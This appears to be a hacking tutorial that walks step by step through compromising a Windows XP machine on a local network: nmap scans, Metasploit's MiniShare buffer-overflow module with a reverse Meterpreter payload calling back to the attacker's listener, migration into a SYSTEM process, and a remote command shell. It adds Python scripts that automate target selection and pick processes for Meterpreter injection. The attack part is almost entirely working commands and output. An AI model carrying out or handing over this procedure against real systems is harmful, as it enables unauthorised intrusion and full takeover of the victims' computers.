Preparation:
[*] nmap
[*] Metasploit
Walkthrough:
1. Scan Host
Exploitation always starts with reconnaissance, often called information gathering. For this stage I will use nmap, specifically to find out which hosts are currently on the Local Area Network. Open a terminal and enter the command:
Command :
root@revolution:~# nmap -sn 192.168.1.1-255
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2012-01-07 20:21 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0022s latency).
MAC Address: F4:EC:38:C5:5B:CC (Tp-link Technologies CO.)
Nmap scan report for 192.168.1.3
Host is up.
Nmap scan report for 192.168.1.4
Host is up (0.00044s latency).
MAC Address: E0:B9:A5:9D:37:E9 (Azurewave)
Nmap scan report for 192.168.1.7
Host is up (0.079s latency).
MAC Address: E0:B9:A5:9D:18:94 (Azurewave)
Nmap done: 255 IP addresses (4 hosts up) scanned in 43.05 seconds
My own address is 192.168.1.3 (the report with no latency and no MAC address, because nmap does not print those for the scanning host itself). Let's look at the open ports on host 192.168.1.4.
2. Reconnaissance - Find Vulnerability
Command :
root@revolution:~# nmap -A 192.168.1.4
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2012-01-07 20:24 WIT
Stats: 0:02:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 94.12% done; ETC: 20:27 (0:00:01 remaining)
Nmap scan report for 192.168.1.4
Host is up (0.0013s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Minishare http interface 1.4.1 (0 files, 0 bytes shared)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Site doesn't have a title (text/html).
MAC Address: E0:B9:A5:9D:37:E9 (Azurewave)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: VICTIM, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:aa:99:56 (VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 1.31 ms 192.168.1
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.10 seconds
OK. Now we know that host 192.168.1.4 is running MiniShare version 1.4.1 on port 80 (this is an nmap version-probe match, not a confirmed version, so it is worth checking the banner by hand before relying on it). The next step is to find a suitable exploit.
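The two scans above produce nmap's normal output, which is written for humans; when this procedure is repeated against many hosts it is easier to parse that output and pick out the target automatically. The following Python script is an added example (not code from this page, nor from the nmap project): it parses the host-discovery report and the port table reproduced above into dictionaries and flags the open port whose version banner mentions MiniShare. The sample input is copied from the scans on this page; the regexes are written against the line formats of nmap's normal output and the function names are my own. For real runs, nmap's `-oG` and `-oX` output formats are the stable machine-readable ones and should be preferred over scraping normal output.

```python
import re

# Sample input: nmap normal output reproduced from the two scans on this page
# (the -sn host discovery and the -A service scan of 192.168.1.4).
DISCOVERY_OUTPUT = """\
Nmap scan report for 192.168.1.1
Host is up (0.0022s latency).
MAC Address: F4:EC:38:C5:5B:CC (Tp-link Technologies CO.)
Nmap scan report for 192.168.1.3
Host is up.
Nmap scan report for 192.168.1.4
Host is up (0.00044s latency).
MAC Address: E0:B9:A5:9D:37:E9 (Azurewave)
Nmap scan report for 192.168.1.7
Host is up (0.079s latency).
MAC Address: E0:B9:A5:9D:18:94 (Azurewave)
Nmap done: 255 IP addresses (4 hosts up) scanned in 43.05 seconds
"""

SERVICE_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http Minishare http interface 1.4.1 (0 files, 0 bytes shared)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
"""

# Line formats of nmap's normal output (column spacing varies, so match by regex).
HOST_RE = re.compile(r"^Nmap scan report for (?P<ip>\S+)")
MAC_RE = re.compile(r"^MAC Address: (?P<mac>[0-9A-Fa-f:]{17})(?: \((?P<vendor>.*)\))?")
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


def parse_hosts(text):
    """Return one dict per host nmap reported as up, with MAC/vendor when shown.

    nmap prints no MAC for the scanning host itself, so those fields stay None.
    """
    hosts = []
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = {"ip": m.group("ip"), "mac": None, "vendor": None}
            continue
        if current is None:
            continue
        if line.startswith("Host is up"):
            hosts.append(current)
            continue
        m = MAC_RE.match(line)
        if m:
            # current is the same dict already appended, so this updates the list entry
            current["mac"] = m.group("mac").upper()
            current["vendor"] = m.group("vendor")
    return hosts


def parse_ports(text):
    """Return the open ports from a PORT/STATE/SERVICE/VERSION table."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group("state") == "open":
            ports.append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "service": m.group("service"),
                "version": m.group("version") or "",
            })
    return ports


def find_service(ports, needle):
    """Open ports whose version banner mentions needle (case-insensitive)."""
    needle = needle.lower()
    return [p for p in ports if needle in p["version"].lower()]


if __name__ == "__main__":
    for h in parse_hosts(DISCOVERY_OUTPUT):
        print(h["ip"], h["mac"] or "-", h["vendor"] or "-")
    for p in find_service(parse_ports(SERVICE_OUTPUT), "minishare"):
        print(f"{p['port']}/{p['proto']}: {p['version']}")
```

On the page's scans this lists the four live hosts (192.168.1.3 without a MAC) and reports 80/tcp as the MiniShare 1.4.1 port; the version string is still only nmap's probe match, so treat it as a lead to confirm, not as proof.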
3. Find The Exploit
In the Metasploit console, type "search minishare" without the quotes. This tells us which exploit module is the right one to use against host 192.168.1.4.
Command :
msf > search minishare
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/http/minishare_get_overflow 2004-11-07 average Minishare 1.4.1 Buffer Overflow
Now we will use this module to gain access.
4. Gaining Access
Enter the following commands in the Metasploit console:
Command :
msf > use exploit/windows/http/minishare_get_overflow
msf exploit(minishare_get_overflow) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
PAYLOAD => windows/meterpreter/reverse_ord_tcp
msf exploit(minishare_get_overflow) > set RHOST 192.168.1.4
RHOST => 192.168.1.4
msf exploit(minishare_get_overflow) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(minishare_get_overflow) > set TARGET 3
TARGET => 3
Then check the exploit settings:
Command :
msf exploit(minishare_get_overflow) > show options
Module options (exploit/windows/http/minishare_get_overflow):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST 192.168.1.4 yes The target address
RPORT 80 yes The target port
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_ord_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.1.3 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
3 Windows XP SP2 English
Then run the exploit. The target address the module tries is hard-coded per target ID, so TARGET must match the victim's service pack and language; a mismatch usually just crashes minishare.exe instead of returning a session.
Command :
msf exploit(minishare_get_overflow) > exploit
[*] Started reverse handler on 192.168.1.3:4444
[*] Trying target address 0x71ab9372...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:1047) at 2012-01-07 20:14:28 +0700
meterpreter >
Success. We have opened our first meterpreter session.
5. Privilege Escalation
Check our identity with the "getuid" command and our current working directory with the "pwd" command (without the quotes):
Command :
meterpreter > getuid
Server username: VICTIM\User
meterpreter > pwd
C:\Program Files\MiniShare
As shown above, we are not NT AUTHORITY\SYSTEM (the Windows equivalent of root): we are running as VICTIM\User inside minishare.exe. To obtain SYSTEM, we will migrate into a process that already runs as SYSTEM, using the "migrate [pid]" command (without the quotes). Note that this is not a privilege-escalation exploit: migrate only succeeds if the current user can open the target process, which here means VICTIM\User must already be a member of the local Administrators group (the default for accounts created during XP setup). As a standard user, migrate would fail with an access-denied error.
To find a PID owned by NT AUTHORITY\SYSTEM, use the "ps" command (without the quotes), then look down the User column for NT AUTHORITY\SYSTEM.
Command :
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1028 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1084 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1148 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1248 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
132 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1328 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1452 explorer.exe x86 0 VICTIM\User C:\WINDOWS\Explorer.EXE
1536 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1628 VMwareTray.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1636 vmtoolsd.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2036 minishare.exe x86 0 VICTIM\User C:\Program Files\MiniShare\minishare.exe
216 TPAutoConnect.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
380 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
4 System x86 0
512 wscntfy.exe x86 0 VICTIM\User C:\WINDOWS\system32\wscntfy.exe
600 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
668 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
680 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
840 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
848 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
856 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
936 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
OK. We now have several PIDs running as NT AUTHORITY\SYSTEM. Migrate with "migrate [pid]". This time I will migrate into PID 856, svchost.exe. A svchost.exe service host is a good choice because it is long-lived and stable; migrating into csrss.exe, winlogon.exe, or lsass.exe risks crashing the machine if anything goes wrong.
Command :
meterpreter > migrate 856
[*] Migrating to 856...
[*] Migration completed successfully.
Then check our identity and working directory again:
Command :
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\WINDOWS\system32
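Choosing the migration target is the step of this procedure that most often goes wrong, so here is an added Python example (not code from this page or from Metasploit) that parses the `ps` listing above and ranks the SYSTEM-owned processes by how safe they are to inject into: same architecture as the running Meterpreter (x86 here), not one of the processes whose death blue-screens or logs off the box (smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe), and long-lived service hosts (svchost.exe, spoolsv.exe) first. The listing is reproduced from this page; the CRITICAL and PREFERRED lists and the function names are my own choices, not anything Meterpreter enforces.

```python
import re

# Sample input: the Meterpreter `ps` listing reproduced from the session on this
# page. Columns are PID Name Arch Session User Path; the User column is empty for
# a few service processes in the original output, and Path can be empty too.
PS_OUTPUT = r"""
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1028 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1084 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1148 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1248 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
132 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1328 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1452 explorer.exe x86 0 VICTIM\User C:\WINDOWS\Explorer.EXE
1536 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1628 VMwareTray.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1636 vmtoolsd.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2036 minishare.exe x86 0 VICTIM\User C:\Program Files\MiniShare\minishare.exe
216 TPAutoConnect.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
380 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
4 System x86 0
512 wscntfy.exe x86 0 VICTIM\User C:\WINDOWS\system32\wscntfy.exe
600 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
668 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
680 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
840 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
848 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
856 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
936 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
"""

# The User column is optional and is told apart from the Path column by its
# DOMAIN\name shape (paths start with a drive letter, \SystemRoot or \??\).
PS_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64)\s+(?P<session>\d+)"
    r"(?:\s+(?P<user>NT AUTHORITY\\(?:SYSTEM|LOCAL SERVICE|NETWORK SERVICE)"
    r"|[\w-]+\\[\w-]+))?"
    r"(?:\s+(?P<path>\S.*))?$"
)

# Processes whose termination takes the machine down or logs the user off;
# never inject into these. (My own list, not something Meterpreter enforces.)
CRITICAL = {"system", "smss.exe", "csrss.exe", "winlogon.exe", "services.exe", "lsass.exe"}

# Long-lived, unremarkable service hosts that make good homes for a Meterpreter stage.
PREFERRED = ["svchost.exe", "spoolsv.exe"]


def parse_ps(text):
    """Parse the `ps` table into dicts; lines that do not fit the format are skipped."""
    procs = []
    for line in text.splitlines():
        m = PS_RE.match(line.rstrip())
        if not m:
            continue
        d = m.groupdict()
        d["pid"] = int(d["pid"])
        d["session"] = int(d["session"])
        procs.append(d)
    return procs


def migration_candidates(procs, user="NT AUTHORITY\\SYSTEM", arch="x86"):
    """Processes owned by `user` that are safe to migrate into, best first.

    Requires the same architecture as the running Meterpreter (an x86 stage
    cannot be injected into an x64 process), drops the CRITICAL set, then orders
    PREFERRED names first and breaks ties by PID.
    """
    def rank(p):
        name = p["name"].lower()
        pref = PREFERRED.index(name) if name in PREFERRED else len(PREFERRED)
        return (pref, p["pid"])

    pool = [p for p in procs
            if p["user"] == user and p["arch"] == arch
            and p["name"].lower() not in CRITICAL]
    return sorted(pool, key=rank)


if __name__ == "__main__":
    cands = migration_candidates(parse_ps(PS_OUTPUT))
    for p in cands:
        print(f"{p['pid']:>5} {p['name']:<20} {p['user']}")
    if cands:
        print(f"meterpreter > migrate {cands[0]['pid']}")
```

On the listing above the first candidate is PID 856, the svchost.exe chosen in the walkthrough, followed by the other SYSTEM svchost instances and spoolsv.exe; smss.exe, csrss.exe, winlogon.exe, services.exe and lsass.exe are never offered even though they also run as SYSTEM.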
To finish, we take over the victim's command prompt with the "shell" command.
Command :
meterpreter > shell
Process 720 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Perfect!
created by: red-dragon